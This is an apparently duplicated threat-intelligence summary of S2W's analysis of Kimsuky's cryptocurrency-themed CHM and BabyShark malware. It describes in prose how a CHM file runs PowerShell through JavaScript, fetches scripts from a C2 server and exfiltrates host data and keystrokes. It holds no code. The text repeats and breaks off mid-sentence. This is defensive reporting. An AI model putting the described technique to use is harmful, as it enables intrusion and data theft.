Kimsuky’s CHM and BabyShark Malware Using Cryptocurrency Theme
Contents
✅ Report Title: Kimsuky’s CHM and BabyShark Malware Using Cryptocurrency Theme
The S2W Threat Intelligence Center has published an analytical report on CHM and BabyShark malware leveraging cryptocurrency themes, attributed to the North Korea-backed APT group Kimsuky.
✅ Executive Summary:
1. Summary
- On May 26, 2025, during continuous tracking of the Kimsuky group, S2W’s Threat Intelligence Center TALON identified and analyzed CHM and BabyShark malware disguised with cryptocurrency-related themes.
- The CHM malware uses the Windows Compiled HTML Help (CHM) format and executes PowerShell commands via JavaScript embedded within HTML files, which then download and run additional scripts from a C2 server.
- The downloaded PowerShell script was identified as a BabyShark variant capable of exfiltrating host information, process data, file directories, and keystrokes from infected systems.
📌 Key Malware File Information: CHM Malware (wallet.chm)
This file uses Microsoft’s CHM (Compiled HTML Help) format and contains a malicious HTML file. When the user opens the CHM …
The S2W Threat Intelligence Center has published an analytical report on CHM and BabyShark malware leveraging cryptocurrency themes, attributed to the North Korea-backed APT group Kimsuky.
✅ Executive Summary:
1. Summary
- On May 26, 2025, during continuous tracking of the Kimsuky group, S2W’s Threat Intelligence Center TALON identified and analyzed CHM and BabyShark malware disguised with cryptocurrency-related themes.
- The CHM malware uses the Windows Compiled HTML Help (CHM) format and executes PowerShell commands via JavaScript embedded within HTML files, which then download and run additional scripts from a C2 server.
- The downloaded PowerShell script was identified as a BabyShark variant capable of exfiltrating host information, process data, file directories, and keystrokes from infected systems.
📌 Key Malware File Information: CHM Malware (wallet.chm)
This file uses Microsoft’s CHM (Compiled HTML Help) format and contains a malicious HTML file. When the user opens the CHM …